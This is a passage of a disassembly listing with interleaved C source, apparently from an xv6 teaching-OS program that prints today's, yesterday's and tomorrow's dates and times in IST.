5:printf(1," May"); 210: 83 ec 08 sub $0x8,%esp 213: 68 6c 12 00 00 push $0x126c 218: 6a 01 push $0x1 21a: e8 e1 0c 00 00 call f00 <printf> break; 21f: 83 c4 10 add $0x10,%esp } 222: c9 leave 223: c3 ret 224: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 6:printf(1," Jun"); 228: 83 ec 08 sub $0x8,%esp 22b: 68 71 12 00 00 push $0x1271 230: 6a 01 push $0x1 232: e8 c9 0c 00 00 call f00 <printf> break; 237: 83 c4 10 add $0x10,%esp } 23a: c9 leave 23b: c3 ret 23c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 7:printf(1," Jul"); 240: 83 ec 08 sub $0x8,%esp 243: 68 76 12 00 00 push $0x1276 248: 6a 01 push $0x1 24a: e8 b1 0c 00 00 call f00 <printf> break; 24f: 83 c4 10 add $0x10,%esp } 252: c9 leave 253: c3 ret 254: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 8:printf(1," Aug"); 258: 83 ec 08 sub $0x8,%esp 25b: 68 7b 12 00 00 push $0x127b 260: 6a 01 push $0x1 262: e8 99 0c 00 00 call f00 <printf> break; 267: 83 c4 10 add $0x10,%esp } 26a: c9 leave 26b: c3 ret 26c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 9:printf(1," Sep"); 270: 83 ec 08 sub $0x8,%esp 273: 68 80 12 00 00 push $0x1280 278: 6a 01 push $0x1 27a: e8 81 0c 00 00 call f00 <printf> break; 27f: 83 c4 10 add $0x10,%esp } 282: c9 leave 283: c3 ret 284: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 10:printf(1," Oct"); 288: 83 ec 08 sub $0x8,%esp 28b: 68 85 12 00 00 push $0x1285 290: 6a 01 push $0x1 292: e8 69 0c 00 00 call f00 <printf> break; 297: 83 c4 10 add $0x10,%esp } 29a: c9 leave 29b: c3 ret 29c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case 11:printf(1," Nov"); 2a0: 83 ec 08 sub $0x8,%esp 2a3: 68 8a 12 00 00 push $0x128a 2a8: 6a 01 push $0x1 2aa: e8 51 0c 00 00 call f00 <printf> break; 2af: 83 c4 10 add $0x10,%esp } 2b2: c9 leave 2b3: c3 ret 2b4: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 2ba: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 000002c0 <day_name>: // this function prints the name of the day of the week void day_name(int x,int y,int z) { 2c0: 55 push %ebp 2c1: 89 e5 mov %esp,%ebp 2c3: 57 push %edi 2c4: 56 push %esi 2c5: 53 push %ebx int initial_day = 4; int count = 0; 2c6: 31 db xor %ebx,%ebx { 2c8: 83 ec 1c sub $0x1c,%esp 2cb: 8b 4d 08 mov 0x8(%ebp),%ecx 2ce: 8b 45 10 mov 0x10(%ebp),%eax 2d1: 8b 7d 0c mov 0xc(%ebp),%edi if(x>1970) 2d4: 81 f9 b2 07 00 00 cmp $0x7b2,%ecx { 2da: 89 45 e4 mov %eax,-0x1c(%ebp) if(x>1970) 2dd: 7e 4f jle 32e <day_name+0x6e> if(x%400==0) 2df: 89 7d e0 mov %edi,-0x20(%ebp) { for(int i=1970;i<x;i++) 2e2: be b2 07 00 00 mov $0x7b2,%esi if(x%400==0) 2e7: 89 cf mov %ecx,%edi 2e9: eb 1d jmp 308 <day_name+0x48> 2eb: 90 nop 2ec: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 2f0: 89 f0 mov %esi,%eax 2f2: e8 99 fd ff ff call 90 <check_leap.part.0> { if(check_leap(i)) 2f7: 85 c0 test %eax,%eax 2f9: 75 21 jne 31c <day_name+0x5c> for(int i=1970;i<x;i++) 2fb: 83 c6 01 add $0x1,%esi count += 366; else count += 365; 2fe: 81 c3 6d 01 00 00 add $0x16d,%ebx for(int i=1970;i<x;i++) 304: 39 f7 cmp %esi,%edi 306: 74 21 je 329 <day_name+0x69> if(x%400==0) 308: b8 1f 85 eb 51 mov $0x51eb851f,%eax 30d: f7 e6 mul %esi 30f: c1 ea 07 shr $0x7,%edx 312: 69 d2 90 01 00 00 imul $0x190,%edx,%edx 318: 39 d6 cmp %edx,%esi 31a: 75 d4 jne 2f0 <day_name+0x30> for(int i=1970;i<x;i++) 31c: 83 c6 01 add $0x1,%esi count += 366; 31f: 81 c3 6e 01 00 00 add $0x16e,%ebx for(int i=1970;i<x;i++) 325: 39 f7 cmp %esi,%edi 327: 75 df jne 308 <day_name+0x48> 329: 89 f9 mov %edi,%ecx 32b: 8b 7d e0 mov -0x20(%ebp),%edi } } for(int i=1;i<y;i++) 32e: 83 ff 01 cmp $0x1,%edi 331: 7e 57 jle 38a <day_name+0xca> if(x%400==0) 333: 89 c8 mov %ecx,%eax 335: ba 1f 85 eb 51 mov $0x51eb851f,%edx 33a: be 01 00 00 00 mov $0x1,%esi 33f: f7 ea imul %edx 341: 89 c8 mov %ecx,%eax 343: c1 f8 1f sar $0x1f,%eax 346: c1 fa 07 sar $0x7,%edx 349: 29 c2 sub %eax,%edx 34b: 89 c8 mov %ecx,%eax 34d: 69 d2 90 01 00 00 imul $0x190,%edx,%edx 353: 29 d0 sub %edx,%eax 355: 89 c2 mov %eax,%edx 357: 89 f6 mov %esi,%esi 359: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi { if(i==2) 360: 83 fe 02 cmp $0x2,%esi 363: 0f 84 f7 00 00 00 je 460 <day_name+0x1a0> if(check_leap(x)) count += 29; else count += 28; } else if((i<8)&&(i%2==1)) 369: 83 fe 07 cmp $0x7,%esi count += 31; 36c: 89 d8 mov %ebx,%eax else if((i<8)&&(i%2==1)) 36e: 0f 8e dc 00 00 00 jle 450 <day_name+0x190> 374: 31 db xor %ebx,%ebx 376: f7 c6 01 00 00 00 test $0x1,%esi 37c: 0f 94 c3 sete %bl 37f: 8d 5c 03 1e lea 0x1e(%ebx,%eax,1),%ebx for(int i=1;i<y;i++) 383: 83 c6 01 add $0x1,%esi 386: 39 f7 cmp %esi,%edi 388: 75 d6 jne 360 <day_name+0xa0> else if((i>=8)&&(i%2==0)) count += 31; else count += 30; } int final_day = (initial_day+count+z-1)%7; 38a: 8b 45 e4 mov -0x1c(%ebp),%eax 38d: ba 93 24 49 92 mov $0x92492493,%edx 392: 8d 4c 03 03 lea 0x3(%ebx,%eax,1),%ecx 396: 89 c8 mov %ecx,%eax 398: f7 ea imul %edx 39a: 89 c8 mov %ecx,%eax 39c: c1 f8 1f sar $0x1f,%eax 39f: 01 ca add %ecx,%edx 3a1: c1 fa 02 sar $0x2,%edx 3a4: 29 c2 sub %eax,%edx 3a6: 8d 04 d5 00 00 00 00 lea 0x0(,%edx,8),%eax 3ad: 29 d0 sub %edx,%eax 3af: 29 c1 sub %eax,%ecx switch(final_day) 3b1: 83 f9 06 cmp $0x6,%ecx 3b4: 0f 87 8e 00 00 00 ja 448 <day_name+0x188> 3ba: ff 24 8d 38 13 00 00 jmp *0x1338(,%ecx,4) 3c1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi break; case 3:printf(1,"Wed"); break; case 4:printf(1,"Thur"); break; case 5:printf(1,"Fri"); 3c8: c7 45 0c a9 12 00 00 movl $0x12a9,0xc(%ebp) break; case 6:printf(1,"Sat"); 3cf: c7 45 08 01 00 00 00 movl $0x1,0x8(%ebp) break; } } 3d6: 83 c4 1c add $0x1c,%esp 3d9: 5b pop %ebx 3da: 5e pop %esi 3db: 5f pop %edi 3dc: 5d pop %ebp case 6:printf(1,"Sat"); 3dd: e9 1e 0b 00 00 jmp f00 <printf> 3e2: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 3e8: c7 45 0c ad 12 00 00 movl $0x12ad,0xc(%ebp) 3ef: eb de jmp 3cf <day_name+0x10f> 3f1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi case 0:printf(1,"Sun"); 3f8: c7 45 0c 94 12 00 00 movl $0x1294,0xc(%ebp) 3ff: eb ce jmp 3cf <day_name+0x10f> 401: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi case 1:printf(1,"Mon"); 408: c7 45 0c 98 12 00 00 movl $0x1298,0xc(%ebp) 40f: eb be jmp 3cf <day_name+0x10f> 411: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi case 2:printf(1,"Tue"); 418: c7 45 0c 9c 12 00 00 movl $0x129c,0xc(%ebp) 41f: eb ae jmp 3cf <day_name+0x10f> 421: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi case 3:printf(1,"Wed"); 428: c7 45 0c a0 12 00 00 movl $0x12a0,0xc(%ebp) 42f: eb 9e jmp 3cf <day_name+0x10f> 431: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi case 4:printf(1,"Thur"); 438: c7 45 0c a4 12 00 00 movl $0x12a4,0xc(%ebp) 43f: eb 8e jmp 3cf <day_name+0x10f> 441: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi } 448: 83 c4 1c add $0x1c,%esp 44b: 5b pop %ebx 44c: 5e pop %esi 44d: 5f pop %edi 44e: 5d pop %ebp 44f: c3 ret count += 31; 450: 89 f3 mov %esi,%ebx 452: 83 e3 01 and $0x1,%ebx 455: 8d 5c 03 1e lea 0x1e(%ebx,%eax,1),%ebx 459: e9 25 ff ff ff jmp 383 <day_name+0xc3> 45e: 66 90 xchg %ax,%ax if(x%400==0) 460: 85 d2 test %edx,%edx 462: 74 1f je 483 <day_name+0x1c3> 464: 89 c8 mov %ecx,%eax 466: 89 55 dc mov %edx,-0x24(%ebp) 469: 89 4d e0 mov %ecx,-0x20(%ebp) 46c: e8 1f fc ff ff call 90 <check_leap.part.0> if(check_leap(x)) 471: 85 c0 test %eax,%eax 473: 8b 4d e0 mov -0x20(%ebp),%ecx 476: 8b 55 dc mov -0x24(%ebp),%edx 479: 75 08 jne 483 <day_name+0x1c3> count += 28; 47b: 83 c3 1c add $0x1c,%ebx 47e: e9 00 ff ff ff jmp 383 <day_name+0xc3> count += 29; 483: 83 c3 1d add $0x1d,%ebx 486: e9 f8 fe ff ff jmp 383 <day_name+0xc3> 48b: 90 nop 48c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 00000490 <time>: // this function prints the current time in IST format void time() { 490: 55 push %ebp 491: 89 e5 mov %esp,%ebp 493: 83 ec 34 sub $0x34,%esp struct rtcdate r; if (date(&r)) 496: 8d 45 e0 lea -0x20(%ebp),%eax 499: 50 push %eax 49a: e8 ab 09 00 00 call e4a <date> 49f: 83 c4 10 add $0x10,%esp 4a2: 85 c0 test %eax,%eax 4a4: 75 50 jne 4f6 <time+0x66> { printf(2, "date failed\n"); exit(); } if(r.minute+30>59) 4a6: 8b 4d e4 mov -0x1c(%ebp),%ecx 4a9: 8b 45 e8 mov -0x18(%ebp),%eax 4ac: 8d 51 1e lea 0x1e(%ecx),%edx 4af: 83 fa 3b cmp $0x3b,%edx 4b2: 77 34 ja 4e8 <time+0x58> r.hour += 6; r.minute = r.minute+30-59; } else { r.hour += 5; 4b4: 83 c0 05 add $0x5,%eax r.minute += 30; 4b7: 89 55 e4 mov %edx,-0x1c(%ebp) r.hour += 5; 4ba: 89 45 e8 mov %eax,-0x18(%ebp) } if(r.hour>=24) 4bd: 83 f8 17 cmp $0x17,%eax 4c0: 76 06 jbe 4c8 <time+0x38> r.hour -= 24; 4c2: 83 e8 18 sub $0x18,%eax 4c5: 89 45 e8 mov %eax,-0x18(%ebp) printf(1," %d:%d:%d",r.hour,r.minute,r.second); 4c8: 83 ec 0c sub $0xc,%esp 4cb: ff 75 e0 pushl -0x20(%ebp) 4ce: 52 push %edx 4cf: 50 push %eax 4d0: 68 be 12 00 00 push $0x12be 4d5: 6a 01 push $0x1 4d7: e8 24 0a 00 00 call f00 <printf> } 4dc: 83 c4 20 add $0x20,%esp 4df: c9 leave 4e0: c3 ret 4e1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi r.minute = r.minute+30-59; 4e8: 8d 51 e3 lea -0x1d(%ecx),%edx r.hour += 6; 4eb: 83 c0 06 add $0x6,%eax 4ee: 89 45 e8 mov %eax,-0x18(%ebp) r.minute = r.minute+30-59; 4f1: 89 55 e4 mov %edx,-0x1c(%ebp) 4f4: eb c7 jmp 4bd <time+0x2d> printf(2, "date failed\n"); 4f6: 50 push %eax 4f7: 50 push %eax 4f8: 68 b1 12 00 00 push $0x12b1 4fd: 6a 02 push $0x2 4ff: e8 fc 09 00 00 call f00 <printf> exit(); 504: e8 99 08 00 00 call da2 <exit> 509: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 00000510 <yesterday>: void yesterday() { 510: 55 push %ebp 511: 89 e5 mov %esp,%ebp 513: 56 push %esi 514: 53 push %ebx struct rtcdate r; if (date(&r)) 515: 8d 45 e0 lea -0x20(%ebp),%eax { 518: 83 ec 2c sub $0x2c,%esp if (date(&r)) 51b: 50 push %eax 51c: e8 29 09 00 00 call e4a <date> 521: 83 c4 10 add $0x10,%esp 524: 85 c0 test %eax,%eax 526: 0f 85 81 01 00 00 jne 6ad <yesterday+0x19d> printf(2, "date failed\n"); exit(); } // if month is march if(r.month == 3) 52c: 8b 45 f0 mov -0x10(%ebp),%eax 52f: 8b 5d ec mov -0x14(%ebp),%ebx 532: 8b 75 f4 mov -0xc(%ebp),%esi 535: 83 f8 03 cmp $0x3,%eax 538: 0f 84 a2 00 00 00 je 5e0 <yesterday+0xd0> r.day -= 1; } } // if date is 1st Jan else if((r.day==1)&&(r.month==1)) 53e: 83 fb 01 cmp $0x1,%ebx 541: 75 09 jne 54c <yesterday+0x3c> 543: 83 f8 01 cmp $0x1,%eax 546: 0f 84 04 01 00 00 je 650 <yesterday+0x140> 54c: 89 c2 mov %eax,%edx 54e: 83 e2 01 and $0x1,%edx r.year -= 1; } else { if(r.month<9) 551: 83 f8 08 cmp $0x8,%eax 554: 77 6a ja 5c0 <yesterday+0xb0> { if(r.month%2==0) 556: 85 d2 test %edx,%edx 558: 74 6a je 5c4 <yesterday+0xb4> else r.day -= 1; } else { if(r.day==1) 55a: 83 fb 01 cmp $0x1,%ebx 55d: 0f 84 15 01 00 00 je 678 <yesterday+0x168> { r.month -= 1; r.day = 30; } else r.day -= 1; 563: 83 eb 01 sub $0x1,%ebx 566: 89 5d ec mov %ebx,-0x14(%ebp) } } } day_name(r.year,r.month,r.day); // prints the name of yesterday's day of the week 569: 83 ec 04 sub $0x4,%esp 56c: 53 push %ebx 56d: 50 push %eax 56e: 56 push %esi 56f: e8 4c fd ff ff call 2c0 <day_name> month_name(r.month); // prints the name of the yesterday's month of the year 574: 58 pop %eax 575: ff 75 f0 pushl -0x10(%ebp) 578: e8 03 fc ff ff call 180 <month_name> printf(1," %d",r.day); // prints yesterday's date 57d: 83 c4 0c add $0xc,%esp 580: ff 75 ec pushl -0x14(%ebp) 583: 68 c8 12 00 00 push $0x12c8 588: 6a 01 push $0x1 58a: e8 71 09 00 00 call f00 <printf> time(); // prints the current time (IST format) 58f: e8 fc fe ff ff call 490 <time> printf(1," IST"); 594: 5a pop %edx 595: 59 pop %ecx 596: 68 f1 12 00 00 push $0x12f1 59b: 6a 01 push $0x1 59d: e8 5e 09 00 00 call f00 <printf> printf(1," %d\n",r.year); // prints yesterday's year 5a2: 83 c4 0c add $0xc,%esp 5a5: ff 75 f4 pushl -0xc(%ebp) 5a8: 68 cc 12 00 00 push $0x12cc 5ad: 6a 01 push $0x1 5af: e8 4c 09 00 00 call f00 <printf> } 5b4: 83 c4 10 add $0x10,%esp 5b7: 8d 65 f8 lea -0x8(%ebp),%esp 5ba: 5b pop %ebx 5bb: 5e pop %esi 5bc: 5d pop %ebp 5bd: c3 ret 5be: 66 90 xchg %ax,%ax if(r.month%2==1) 5c0: 85 d2 test %edx,%edx 5c2: 74 96 je 55a <yesterday+0x4a> if(r.day==1) 5c4: 83 fb 01 cmp $0x1,%ebx 5c7: 75 9a jne 563 <yesterday+0x53> r.month -= 1; 5c9: 83 e8 01 sub $0x1,%eax r.day = 31; 5cc: c7 45 ec 1f 00 00 00 movl $0x1f,-0x14(%ebp) 5d3: bb 1f 00 00 00 mov $0x1f,%ebx r.month -= 1; 5d8: 89 45 f0 mov %eax,-0x10(%ebp) 5db: eb 8c jmp 569 <yesterday+0x59> 5dd: 8d 76 00 lea 0x0(%esi),%esi if(x%400==0) 5e0: 89 f0 mov %esi,%eax 5e2: ba 1f 85 eb 51 mov $0x51eb851f,%edx 5e7: f7 ea imul %edx 5e9: 89 f0 mov %esi,%eax 5eb: c1 f8 1f sar $0x1f,%eax 5ee: c1 fa 07 sar $0x7,%edx 5f1: 29 c2 sub %eax,%edx 5f3: 69 d2 90 01 00 00 imul $0x190,%edx,%edx 5f9: 39 d6 cmp %edx,%esi 5fb: 74 2b je 628 <yesterday+0x118> 5fd: 89 f0 mov %esi,%eax 5ff: e8 8c fa ff ff call 90 <check_leap.part.0> if(check_leap(r.year)) 604: 85 c0 test %eax,%eax 606: 75 20 jne 628 <yesterday+0x118> if(r.day==1) 608: 83 fb 01 cmp $0x1,%ebx 60b: 0f 84 7f 00 00 00 je 690 <yesterday+0x180> r.day -= 1; 611: 83 eb 01 sub $0x1,%ebx 614: b8 03 00 00 00 mov $0x3,%eax 619: 89 5d ec mov %ebx,-0x14(%ebp) 61c: e9 48 ff ff ff jmp 569 <yesterday+0x59> 621: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi if(r.day==1) 628: 83 fb 01 cmp $0x1,%ebx 62b: 75 e4 jne 611 <yesterday+0x101> r.month -= 1; 62d: c7 45 f0 02 00 00 00 movl $0x2,-0x10(%ebp) r.day = 29; 634: c7 45 ec 1d 00 00 00 movl $0x1d,-0x14(%ebp) 63b: b8 02 00 00 00 mov $0x2,%eax 640: bb 1d 00 00 00 mov $0x1d,%ebx 645: e9 1f ff ff ff jmp 569 <yesterday+0x59> 64a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi r.year -= 1; 650: 83 ee 01 sub $0x1,%esi r.month = 12; 653: c7 45 f0 0c 00 00 00 movl $0xc,-0x10(%ebp) r.day = 31; 65a: c7 45 ec 1f 00 00 00 movl $0x1f,-0x14(%ebp) r.year -= 1; 661: 89 75 f4 mov %esi,-0xc(%ebp) 664: b8 0c 00 00 00 mov $0xc,%eax 669: bb 1f 00 00 00 mov $0x1f,%ebx 66e: e9 f6 fe ff ff jmp 569 <yesterday+0x59> 673: 90 nop 674: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi r.month -= 1; 678: 83 e8 01 sub $0x1,%eax r.day = 30; 67b: c7 45 ec 1e 00 00 00 movl $0x1e,-0x14(%ebp) 682: bb 1e 00 00 00 mov $0x1e,%ebx r.month -= 1; 687: 89 45 f0 mov %eax,-0x10(%ebp) 68a: e9 da fe ff ff jmp 569 <yesterday+0x59> 68f: 90 nop r.month -= 1; 690: c7 45 f0 02 00 00 00 movl $0x2,-0x10(%ebp) r.day = 28; 697: c7 45 ec 1c 00 00 00 movl $0x1c,-0x14(%ebp) 69e: b8 02 00 00 00 mov $0x2,%eax 6a3: bb 1c 00 00 00 mov $0x1c,%ebx 6a8: e9 bc fe ff ff jmp 569 <yesterday+0x59> printf(2, "date failed\n"); 6ad: 53 push %ebx 6ae: 53 push %ebx 6af: 68 b1 12 00 00 push $0x12b1 6b4: 6a 02 push $0x2 6b6: e8 45 08 00 00 call f00 <printf> exit(); 6bb: e8 e2 06 00 00 call da2 <exit> 000006c0 <today>: // this function prints today's date and current time (IST format) void today() { 6c0: 55 push %ebp 6c1: 89 e5 mov %esp,%ebp 6c3: 83 ec 34 sub $0x34,%esp struct rtcdate r; if (date(&r)) 6c6: 8d 45 e0 lea -0x20(%ebp),%eax 6c9: 50 push %eax 6ca: e8 7b 07 00 00 call e4a <date> 6cf: 83 c4 10 add $0x10,%esp 6d2: 85 c0 test %eax,%eax 6d4: 75 56 jne 72c <today+0x6c> { printf(2, "date failed\n"); exit(); } day_name(r.year,r.month,r.day); // prints the name of day of the week 6d6: 83 ec 04 sub $0x4,%esp 6d9: ff 75 ec pushl -0x14(%ebp) 6dc: ff 75 f0 pushl -0x10(%ebp) 6df: ff 75 f4 pushl -0xc(%ebp) 6e2: e8 d9 fb ff ff call 2c0 <day_name> month_name(r.month); // prints the name of the month of the year 6e7: 58 pop %eax 6e8: ff 75 f0 pushl -0x10(%ebp) 6eb: e8 90 fa ff ff call 180 <month_name> printf(1," %d",r.day); // prints the today's date 6f0: 83 c4 0c add $0xc,%esp 6f3: ff 75 ec pushl -0x14(%ebp) 6f6: 68 c8 12 00 00 push $0x12c8 6fb: 6a 01 push $0x1 6fd: e8 fe 07 00 00 call f00 <printf> time(); // prints the current time (IST format) 702: e8 89 fd ff ff call 490 <time> printf(1," IST"); 707: 5a pop %edx 708: 59 pop %ecx 709: 68 f1 12 00 00 push $0x12f1 70e: 6a 01 push $0x1 710: e8 eb 07 00 00 call f00 <printf> printf(1," %d\n",r.year); // prints the current year 715: 83 c4 0c add $0xc,%esp 718: ff 75 f4 pushl -0xc(%ebp) 71b: 68 cc 12 00 00 push $0x12cc 720: 6a 01 push $0x1 722: e8 d9 07 00 00 call f00 <printf> } 727: 83 c4 10 add $0x10,%esp 72a: c9 leave 72b: c3 ret printf(2, "date failed\n"); 72c: 50 push %eax 72d: 50 push %eax 72e: 68 b1 12 00 00 push $0x12b1 733: 6a 02 push $0x2 735: e8 c6 07 00 00 call f00 <printf> exit(); 73a: e8 63 06 00 00 call da2 <exit> 73f: 90 nop 00000740 <tomorrow>: // this function prints tomorrow's date and time (IST format) void tomorrow() { 740: 55 push %ebp 741: 89 e5 mov %esp,%ebp 743: 56 push %esi 744: 53 push %ebx struct rtcdate r; if (date(&r)) 745: 8d 45 e0 lea -0x20(%ebp),%eax { 748: 83 ec 2c sub $0x2c,%esp if (date(&r)) 74b: 50 push %eax 74c: e8 f9 06 00 00 call e4a <date> 751: 83 c4 10 add $0x10,%esp 754: 85 c0 test %eax,%eax 756: 0f 85 3f 01 00 00 jne 89b <tomorrow+0x15b> printf(2, "date failed\n"); exit(); } // if month is Feb if(r.month == 2) 75c: 8b 45 f0 mov -0x10(%ebp),%eax 75f: 8b 5d ec mov -0x14(%ebp),%ebx 762: 8b 75 f4 mov -0xc(%ebp),%esi 765: 83 f8 02 cmp $0x2,%eax 768: 0f 84 a2 00 00 00 je 810 <tomorrow+0xd0> r.day += 1; } } // if the date is 31st Dec else if((r.day==31)&&(r.month==12)) 76e: 83 fb 1f cmp $0x1f,%ebx 771: 75 09 jne 77c <tomorrow+0x3c> 773: 83 f8 0c cmp $0xc,%eax 776: 0f 84 fc 00 00 00 je 878 <tomorrow+0x138> 77c: 89 c2 mov %eax,%edx 77e: 83 e2 01 and $0x1,%edx r.year += 1; } else { if(r.month<8) 781: 83 f8 07 cmp $0x7,%eax 784: 77 6a ja 7f0 <tomorrow+0xb0> { if(r.month%2==1) 786: 85 d2 test %edx,%edx 788: 74 6a je 7f4 <tomorrow+0xb4> else r.day += 1; } else { if(r.day==31) 78a: 83 fb 1f cmp $0x1f,%ebx 78d: 74 6a je 7f9 <tomorrow+0xb9> { r.month += 1; r.day = 1; } else r.day += 1; 78f: 83 c3 01 add $0x1,%ebx 792: 89 5d ec mov %ebx,-0x14(%ebp) } } } day_name(r.year,r.month,r.day); // prints the name of tomorrow's day of the week 795: 83 ec 04 sub $0x4,%esp 798: 53 push %ebx 799: 50 push %eax 79a: 56 push %esi 79b: e8 20 fb ff ff call 2c0 <day_name> month_name(r.month); // prints the name of the tomorrow's month of the year 7a0: 58 pop %eax 7a1: ff 75 f0 pushl -0x10(%ebp) 7a4: e8 d7 f9 ff ff call 180 <month_name> printf(1," %d",r.day); // prints tomorrow's date 7a9: 83 c4 0c add $0xc,%esp 7ac: ff 75 ec pushl -0x14(%ebp) 7af: 68 c8 12 00 00 push $0x12c8 7b4: 6a 01 push $0x1 7b6: e8 45 07 00 00 call f00 <printf> time(); // prints the current time (IST format) 7bb: e8 d0 fc ff ff call 490 <time> printf(1," IST"); 7c0: 5a pop %edx 7c1: 59 pop %ecx 7c2: 68 f1 12 00 00 push $0x12f1 7c7: 6a 01 push $0x1 7c9: e8 32 07 00 00 call f00 <printf> printf(1," %d\n",r.year); // prints tomorrow's year 7ce: 83 c4 0c add $0xc,%esp 7d1: ff 75 f4 pushl -0xc(%ebp) 7d4: 68 cc 12 00 00 push $0x12cc 7d9: 6a 01 push $0x1 7db: e8 20 07 00 00 call f00 <printf> } 7e0: 83 c4 10 add $0x10,%esp 7e3: 8d 65 f8 lea -0x8(%ebp),%esp 7e6: 5b pop %ebx 7e7: 5e pop %esi 7e8: 5d pop %ebp 7e9: c3 ret 7ea: 8d b6 00 00 00 00 lea 0x0(%esi),%esi if(r.month%2==1) 7f0: 85 d2 test %edx,%edx 7f2: 74 96 je 78a <tomorrow+0x4a> if(r.day==30) 7f4: 83 fb 1e cmp $0x1e,%ebx 7f7: 75 96 jne 78f <tomorrow+0x4f> r.month += 1; 7f9: 83 c0 01 add $0x1,%eax r.day = 1; 7fc: c7 45 ec 01 00 00 00 movl $0x1,-0x14(%ebp) 803: bb 01 00 00 00 mov $0x1,%ebx r.month += 1; 808: 89 45 f0 mov %eax,-0x10(%ebp) 80b: eb 88 jmp 795 <tomorrow+0x55> 80d: 8d 76 00 lea 0x0(%esi),%esi if(x%400==0) 810: 89 f0 mov %esi,%eax 812: ba 1f 85 eb 51 mov $0x51eb851f,%edx 817: f7 ea imul %edx 819: 89 f0 mov %esi,%eax 81b: c1 f8 1f sar $0x1f,%eax 81e: c1 fa 07 sar $0x7,%edx 821: 29 c2 sub %eax,%edx 823: 69 d2 90 01 00 00 imul $0x190,%edx,%edx 829: 39 d6 cmp %edx,%esi 82b: 74 23 je 850 <tomorrow+0x110> 82d: 89 f0 mov %esi,%eax 82f: e8 5c f8 ff ff call 90 <check_leap.part.0> if(check_leap(r.year)) 834: 85 c0 test %eax,%eax 836: 75 18 jne 850 <tomorrow+0x110> if(r.day==28) 838: 83 fb 1c cmp $0x1c,%ebx 83b: 74 18 je 855 <tomorrow+0x115> r.day += 1; 83d: 83 c3 01 add $0x1,%ebx 840: b8 02 00 00 00 mov $0x2,%eax 845: 89 5d ec mov %ebx,-0x14(%ebp) 848: e9 48 ff ff ff jmp 795 <tomorrow+0x55> 84d: 8d 76 00 lea 0x0(%esi),%esi if(r.day==29) 850: 83 fb 1d cmp $0x1d,%ebx 853: 75 e8 jne 83d <tomorrow+0xfd> r.month += 1; 855: c7 45 f0 03 00 00 00 movl $0x3,-0x10(%ebp) r.day = 1; 85c: c7 45 ec 01 00 00 00 movl $0x1,-0x14(%ebp) 863: b8 03 00 00 00 mov $0x3,%eax 868: bb 01 00 00 00 mov $0x1,%ebx 86d: e9 23 ff ff ff jmp 795 <tomorrow+0x55> 872: 8d b6 00 00 00 00 lea 0x0(%esi),%esi r.year += 1; 878: 83 c6 01 add $0x1,%esi r.month = 1; 87b: c7 45 f0 01 00 00 00 movl $0x1,-0x10(%ebp) r.day = 1; 882: c7 45 ec 01 00 00 00 movl $0x1,-0x14(%ebp) r.year += 1; 889: 89 75 f4 mov %esi,-0xc(%ebp) 88c: b8 01 00 00 00 mov $0x1,%eax 891: bb 01 00 00 00 mov $0x1,%ebx 896: e9 fa fe ff ff jmp 795 <tomorrow+0x55> printf(2, "date failed\n"); 89b: 53 push %ebx 89c: 53 push %ebx 89d: 68 b1 12 00 00 push $0x12b1 8a2: 6a 02 push $0x2 8a4: e8 57 06 00 00 call f00 <printf> exit(); 8a9: e8 f4 04 00 00 call da2 <exit> 8ae: 66 90 xchg %ax,%ax 000008b0 <particular_day>: // if user uses -d option with a particular date void particular_day(char *x) { 8b0: 55 push %ebp int flag = 1; for(int i=0;i<4;i++) 8b1: 31 c0 xor %eax,%eax { 8b3: 89 e5 mov %esp,%ebp 8b5: 57 push %edi 8b6: 56 push %esi 8b7: 53 push %ebx 8b8: 83 ec 1c sub $0x1c,%esp 8bb: 8b 5d 08 mov 0x8(%ebp),%ebx { if(*(x+i)=='-') 8be: 80 3c 03 2d cmpb $0x2d,(%ebx,%eax,1) 8c2: 0f 84 68 01 00 00 je a30 <particular_day+0x180> for(int i=0;i<4;i++) 8c8: 83 c0 01 add $0x1,%eax 8cb: 83 f8 04 cmp $0x4,%eax 8ce: 75 ee jne 8be <particular_day+0xe> int flag = 1; 8d0: be 01 00 00 00 mov $0x1,%esi break; } } for(int i=5;i<7;i++) { if(*(x+i)=='-') 8d5: 0f b6 4b 05 movzbl 0x5(%ebx),%ecx 8d9: 0f b6 53 08 movzbl 0x8(%ebx),%edx 8dd: 80 f9 2d cmp $0x2d,%cl 8e0: 88 55 e4 mov %dl,-0x1c(%ebp) 8e3: 0f 84 2f 01 00 00 je a18 <particular_day+0x168> 8e9: 0f b6 43 06 movzbl 0x6(%ebx),%eax 8ed: 3c 2d cmp $0x2d,%al 8ef: 88 45 e3 mov %al,-0x1d(%ebp) 8f2: 0f 84 20 01 00 00 je a18 <particular_day+0x168> break; } } for(int i=8;i<10;i++) { if(*(x+i)=='-') 8f8: 80 fa 2d cmp $0x2d,%dl 8fb: 0f 84 17 01 00 00 je a18 <particular_day+0x168> 901: 0f b6 43 09 movzbl 0x9(%ebx),%eax { flag = 0; break; } } if(flag==0) 905: 85 f6 test %esi,%esi if(*(x+i)=='-') 907: 88 45 e2 mov %al,-0x1e(%ebp) if(flag==0) 90a: 0f 84 08 01 00 00 je a18 <particular_day+0x168> 910: 3c 2d cmp $0x2d,%al 912: 0f 84 00 01 00 